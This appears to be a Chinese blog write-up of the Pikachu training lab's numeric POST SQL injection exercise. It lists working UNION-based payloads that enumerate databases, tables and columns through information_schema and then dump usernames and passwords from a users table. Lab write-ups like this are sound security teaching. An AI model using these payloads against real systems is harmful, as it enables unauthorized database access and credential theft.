首页 > 其他分享 >数字型注入(post)

数字型注入(post)

时间:2024-11-15 09:40:46浏览次数:1  
标签:E8% A5% AF% submit 数字型 A2 post id 注入

数字型注入(post)

打开靶场,发现数字列表查询,点击查询发现POST请求和idsubmit参数

image-20241115092355617

bp抓包,根据题目数字注入提示,尝试用1+1方式查询,+编码为%2B

id=1%2B1&submit=%E6%9F%A5%E8%AF%A2

image-20241115092725608

成功回显

order by查询字段数,在为3的时候回显异常,判断字段数为2

image-20241115093606915

查库,查出数据库为pikachu

id=1 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2

image-20241115093645853

爆库,确定pikachu为目标数据库

id=1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata&submit=%E6%9F%A5%E8%AF%A2

image-20241115093852251

爆表,查询出全部数据表

id=1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu"&submit=%E6%9F%A5%E8%AF%A2

image-20241115094100803

爆users字段

id=1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="users"&submit=%E6%9F%A5%E8%AF%A2

image-20241115094217771

爆字段

id=1 UNION SELECT 1,concat(id,'--',username,'--',password,'--',level) from users&submit=%E6%9F%A5%E8%AF%A2

image-20241115094541476

成功拿下全部用户信息

标签:E8%,A5%,AF%,submit,数字型,A2,post,id,注入
From: https://www.cnblogs.com/tazmi/p/18547393

相关文章

  • 联通ChinaER:为Azure云跨境连接注入新活力
    在当今全球化的商业环境中,企业对于跨境数据连接的需求日益增强。为了满足这一需求,中国联通推出了ChinaER(ChinaUnicomCloudBondExpressRoute)服务,这是一项专为微软Azure云设计的跨境互联服务。ChinaER凭借其快捷部署、安全可靠以及灵活多样的特点,正逐步成为企业跨境连接的首选方......
  • PHP代码审计 - SQL注入
    SQL注入正则搜索(update|select|insert|delete).*?where.*=示例一:bluecms源码下载:source-trace/bluecms以项目打开网站根目录,并以ctrl+shift+f打开全局搜索(update|select|insert|delete).*?where.*=并开启正则匹配最快寻找脆弱点的方法:1、是否有可控的值2、......
  • postgresql逆向工程
    packagestanfordcorenlp.wang.biao.diy;importcom.baomidou.mybatisplus.annotation.FieldFill;importcom.baomidou.mybatisplus.generator.FastAutoGenerator;importcom.baomidou.mybatisplus.generator.config.DataSourceConfig;importcom.baomidou.mybatisplus.g......
  • Postman接口测试从入门到精通(二)
    十一、Postman批量运行测试用例十二、Postman数据驱动之cSV文件和JSON文件的处理十三、测试必须带请求头的接口常见的请求头:Host请求的主机地址connection  连接方式Accept客户端接收到的数据格式×-Requestea-Wih异步请求 User-Agent  客户端的用户类型Reterer  ......
  • Grafana:监控PostgreSQL数据运维新利器
    在数据驱动的业务环境中,数据库的性能监控是确保数据流畅和系统稳定的关键。PostgreSQL,作为强大的开源关系型数据库,其性能监控尤为重要。Grafana,一个开源的数据可视化和监控平台,提供了一个直观的界面来监控和分析数据。本文将带您了解如何利用Grafana来监控PostgreSQL,让您的数据库......
  • 爬虫开发工具与环境搭建——使用Postman和浏览器开发者工具
    第三节:使用Postman和浏览器开发者工具在网络爬虫开发过程中,我们经常需要对HTTP请求进行测试、分析和调试。Postman和浏览器开发者工具(特别是Network面板和Console面板)是两种最常用的工具,能够帮助开发者有效地捕获、分析和调试HTTP请求与响应,从而使爬虫的开发过程更加顺利。1.......
  • SQL注入【sqli靶场第11-14关】(三)
    SQL注入【sqli靶场第11-14关】(三)★★免责声明★★文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。0、总体思路先确认是否可以SQL注入,使用单双引号,1/0,括号测试'"1/0)......
  • Java 项目注入、上传、搜索及插件挖掘的代码审计
    目录Java项目注入、上传、搜索及插件挖掘的代码审计一、什么是Java项目注入、上传、搜索及插件挖掘的代码审计二、原理(一)注入原理(二)文件上传原理(三)搜索功能安全原理(四)插件安全原理三、步骤与代码示例(一)准备工作(二)注入攻击审计步骤与代码示例(三)文件上传审计步骤与......
  • PostgreSQL 创建相同结构的表
    我们经常会遇到这样的需求,就是我有一个表A,现在表A由于设计的时候存在一些缺陷,我现在需要创建一个相同结构的表B但是不需要表A的数据,只需要保持其原来的表设计即可。有啥快速的方法没有。下面我介绍下几种常见的方法和每种方法的缺点以及最好的方法。方法一:BEGIN;CREA......
  • more Layer Architecture in Python and postgreSQL17.0
    postgreSQLscript:createtableSchool--創建表(SchoolIdchar(5)NOTNULLPRIMARYKEY,SchoolNamevarchar(500)NOTNULLDEFAULT'',SchoolTelNovarchar(8)NULLDEFAULT'');model:#encoding:utf-8#版权所有20......